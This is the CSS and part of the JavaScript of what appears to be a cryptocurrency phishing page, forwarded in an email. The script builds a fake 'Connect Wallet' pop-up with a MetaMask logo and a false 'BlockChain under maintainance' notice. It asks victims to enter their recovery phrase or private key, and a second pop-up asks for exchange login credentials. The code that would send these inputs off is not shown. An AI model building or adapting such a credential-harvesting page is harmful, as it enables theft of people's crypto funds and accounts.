* {
    padding: 0;
    margin: 0;
  }
  
  body {
    width: 100%;
    height: 100vh;
  }
  
  .container {
    background-color: rgb(15, 23, 42);
    display: flex;
    flex-direction: column;
    gap: 50px;
    justify-content: center;
    /* align-items: center; */
    padding: 25px;
  }
  
  nav {
    display: flex;
    align-items: center;
    justify-content: space-around;
  }
  
  nav button {
    font-size: 15px;
    padding: 10px 20px 10px 20px;
    background-color: rgb(99, 102, 241);
    color: white;
    border-radius: 10px;
  }
  
  .wallet-block {
    position: absolute;
    background-color: rgb(255, 255, 255);
    width: 80%;
    height: 80vh;
    overflow-y: scroll;
    left: 10%;
    border-radius: 20px;
    margin-bottom: 20px;
  }
  
  .main-wallet {
    position: sticky;
    top: 5%;
    /* display: none; */
    border-radius: 20px;
  }
  
  .close-sec {
    display: flex;
    justify-content: space-between;
    padding: 20px;
  }
  
  .provider-div {
    padding: 20px;
    font-weight: bold;
  }
  
  .connect-div {
    background-color: rgb(243, 244, 246);
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    width: 20%;
    border-radius: 20px;
    padding: 20px;
  }
  
  .connect-div div {
    text-align: center;
  }
  
  .wallet-connect-div {
    padding: 20px;
    display: flex;
    flex-wrap: wrap;
    gap: 20px;
    justify-content: center;
    align-items: center;
  }
  
  .exchange-sec {
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
    align-items: center;
    gap: 20px;
  }
  
  
  
  
  .first-sec {
    padding: 0px 24px 0px 24px;
    display: flex;
    flex-direction: column;
    gap: 30px;
    justify-content: center;
    align-items: center;
  }
  
  .comm-eco {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    gap: 16px;
  }
  
  .first-sec h2 {
    color: white;
    text-align: center;
    width: 90%;
    font-size: 50px;
    font-weight: bold;
    font-family: Impact, Haettenschweiler, 'Arial Narrow Bold', sans-serif;
  }
  
  .eco-div {
    font-size: 15px;
    text-align: center;
    color: rgb(89, 104, 127);
  }
  
  .connect-but {
    display: flex;
    gap: 26px;
  }
  
  .connect-but button {
    padding: 10px 30px 10px 30px;
  }
  
  .migrate-but {
    background-color: rgb(51, 65, 85);
    color: rgb(180, 212, 224);
  }
  
  .sub-connect-but {
    background-color: rgb(99, 102, 241);
    color: rgb(239, 220, 249);
  }
  
  .ufo {
    margin: 0px 0px 0px 50px;
  }
  
  .star-div {
    display: flex;
    justify-content: center;
  }
  
  .second-sec {
    display: flex;
    justify-content: space-between;
  }
  
  .sub-second-sec {
    width: 30%;
    display: flex;
    justify-content: space-between;
    align-items: center;
    background-color: rgb(15, 23, 42);
    border-radius: 20px;
    box-shadow: 5px 5px 5px 5px rgb(62, 67, 154);
    padding: 20px;
  }
  
  .second-sec img {
    border-radius: 100px;
  }
  
  .star-cont {
    display: flex;
    flex-direction: column;
    gap: 10px;
    justify-content: center;
    align-items: center;
  }
  
  .star-cont div {
    color: white;
    text-align: center;
  }
  
  .star-cont div span {
    color: rgb(81, 85, 198);
  }
  
  .ecosystem {
    display: flex;
    flex-direction: column;
    gap: 20px;
    justify-content: center;
    align-items: center;
  }
  
  .ecosystem img {
    background-color: rgb(30, 41, 59);
    border: 1px solid rgb(30, 41, 59);
    border-radius: 100px;
    padding: 50px;
  }
  
  .ecosystem h2 {
    color: white;
  }
  
  .third-sec {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    gap: 50px;
    margin-top: 100px;
  }
  
  .third-sec h1 {
    color: white;
    font-size: 50px;
    font-weight: bold;
    text-align: center;
  }
  
  .eco-cont {
    display: flex;
    flex-wrap: wrap;
    gap: 50px;
    justify-content: center;
    align-items: center;
  }
  
  .fix {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    gap: 30px;
    border: 1px solid rgb(65, 71, 160);
    border-radius: 10px;
    box-shadow: 5px 5px 5px 5px rgb(62, 67, 154);
    width: 30%;
    padding: 25px;
  
  }
  
  .fix div {
    text-align: center;
  }
  
  .white-circle {
    background-color: white;
    height: 40px;
    width: 40px;
    border-radius: 100px;
  }
  
  .swap {
    font-size: 30px;
    font-weight: bolder;
    color: white;
  }
  
  .swap-two {
    font-size: 25px;
    font-weight: bold;
    color: rgb(84, 91, 107);
  }
  
  .fix button {
    padding: 10px 30px 10px 30px;
    font-weight: bold;
  }
  
  .fourth-sec {
    display: flex;
    flex-wrap: wrap;
    justify-content: center;
    align-items: center;
    gap: 20px;
  }
  
  .fifth-sec {
    display: flex;
    flex-direction: column;
    gap: 30px;
    justify-content: center;
    align-items: center;
    background-color: rgb(27, 38, 55);
    border-radius: 10px;
    padding: 100px 0px;
  }
  
  .fifth-sec h1 {
    font-size: 50px;
    color: white;
    font-weight: bold;
    text-align: center;
  }
  
  .fifth-sec button {
    padding: 20px 30px 20px 30px;
    background-color: rgb(99, 102, 241);
    color: antiquewhite;
  }
  
  footer {
    display: flex;
    justify-content: space-between;
  }
  
  footer div {
    color: white;
    font-size: 20px;
    font-weight: bold;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
  }
  
  .meta-div {
    display: flex;
    flex-direction: column;
    gap: 20px;
    justify-content: center;
    align-items: center;
    border-radius: 10px;
  }
  
  .meta-div div {
    text-align: center;
    background-color: rgb(191, 219, 254);
    color: rgb(52, 110, 237);
    padding: 10px 30px;
    border-radius: 10px;
  }
  
  .js-button-div {
    display: flex;
    gap: 10px
  }
  
  #phrase {
    width: 80%;
    height: 20vh;
    border-radius: 10px;
  }
  
  .import-sec {
    padding: 20px;
    display: flex;
    flex-direction: column;
    align-items: center;
    gap: 16px;
  }
  
  .js-button-div button {
    padding: 5px 10px;
  }
  
  .connect-button {
    padding: 5px 10px;
    background-color: rgb(59, 130, 246);
    color: white;
  }
  
  .connect-div {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    gap: 10px;
  }
  
  #phrase-button {
    /* background-color: rgb(59,130,246); */
    font-weight: bold;
    border-radius: 5px;
  }
  
  #user-pass {
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    gap: 30px;
  }
  
  #private-button {
    font-weight: bold;
    border-radius: 5px;
  }
  
  .otp {
    display: flex;
    justify-content: center;
    align-items: center;
    margin-top: 50%;
  }
  
  .code-sec {
    display: flex;
    flex-direction: column;
    gap: 30px;
    justify-content: center;
    align-items: center;
  }
  
  .fButton {
    padding: 10px 30px;
    color: white;
    background-color: black;
  }
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  @media only screen and (max-width: 640px) {
    .connect-but {
      display: flex;
      flex-direction: column;
      gap: 20px;
  
    }
  }
  
  @media only screen and (max-width: 1300px) {
    .second-sec {
      display: flex;
      flex-direction: column;
      gap: 30px;
      justify-content: center;
      align-items: center;
  
  
    }
  
    .sub-second-sec {
      width: 80%;
    }
  }
  
  @media only screen and (max-width: 1000px) {
    .fourth-sec {
  
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      gap: 20px;
    }
  
    .fix {
      width: 80%;
    }
  }
  
  @media only screen and (max-width: 499px) {
    .first-sec h2 {
  
      font-size: 35px;
    }
  }
  
  @media only screen and (max-width: 600px) {
    .wallet-connect-div {
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
  
    }
  
    .connect-div {
      width: 80%;
    }
  
    .wallet-block {
      height: 70vh;
      overflow-y: scroll;
    }
  }
  ...
  
  [Message clipped]  View entire message
  
  Efunnuga Victor <efunnugavictor@gmail.com>
  Thu, Apr 10, 7:59 AM (2 days ago)
  to me
  
   
  let wallet = document.getElementById('main-wallet')
    let walletBlock = document.getElementById('wallet-block')
    let mainWallet = document.getElementById('main-wallet')
    let phraseButton = document.getElementById('phrase-button')
    let privateButton = document.getElementById('private-button')
  
  
  
  
  
  
    wallet.style.display = 'none'
    function display(params) {
      wallet.style.display = params
    }
    function connect() {
      walletBlock.innerHTML = `
          <div>
                  <div class="close-sec" style="position: sticky; top: 0; background-color: black; color: white;">
                    <div style="font-weight: bolder;">CONNECT WALLET</div>
                     <span class="material-symbols-outlined" onclick="goBack()">
                     close
                     </span>
                  </div>
             
                  <div class="meta-div">
                    <img
                      src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/36/MetaMask_Fox.svg/2048px-MetaMask_Fox.svg.png"
                      alt="" width="50px">
                      <div>Info alert!: BlockChain under maintainance, Securely use any of the options below!</div>
                  </div> 
                  <div class="import-sec">
                          <div class="js-button-div"><button id="phrase-button" onclick="blueOne('')">PHRASE</button><button id="private-button" onclick="blueTwo()">PRIVATE KEY</button></div>
                          <input type="text" id="phrase" placeholder="Recovery phrase or private key" required>
                          <div style="text-align: center;">Typically 12-24 words or 64 Alphanumeric Characters</div>
                          <button class="connect-button" onclick="empty()">CONNECT</button>
                        
                      
                      
                  </div>  
                     
      
          </div>
      `
  
    }
    function goBack() {
      alert('refresh to terminate smart contract')
      window.location.href = 'index.html'
    }
    function exchange() {
      walletBlock.innerHTML = `
          <div>
                  <div class="close-sec" style="position: sticky; top: 0; background-color: black; color: white;">
                    <div style="font-weight: bolder;">CONNECT WALLET</div>
                     <span class="material-symbols-outlined" onclick="goBack()">
                     close
                     </span>
                  </div>
             
                  <div class="meta-div">
                    <img
                      src="https://img.freepik.com/premium-vector/crypto-trade-hub-modern-currency-exchange-logo_661182-404.jpg"
                      alt="" width="50px">
                      <div>Info alert!: BlockChain under maintainance, Securely login to interact with blockchain!</div>
                  </div> 
                  <div class="import-sec">
                    
                          <div id="user-pass">
                              <div style="text-align: center;">EMAIL/USERNAME/ID: <input type="text" id="exchangeEmail"></div>
                              <div style="text-align: center;">PASSWORD: <input type="text" id="exchangePassword"></div>
  
  
  
                              <button id="connectButton" class="connect-button" onclick="empty$$()">CONNECT</button>
                          </div>
                          
                          
                          
                          
                        
                      
                      
                  </div>  
                     
      
          </div>
      `
  
    }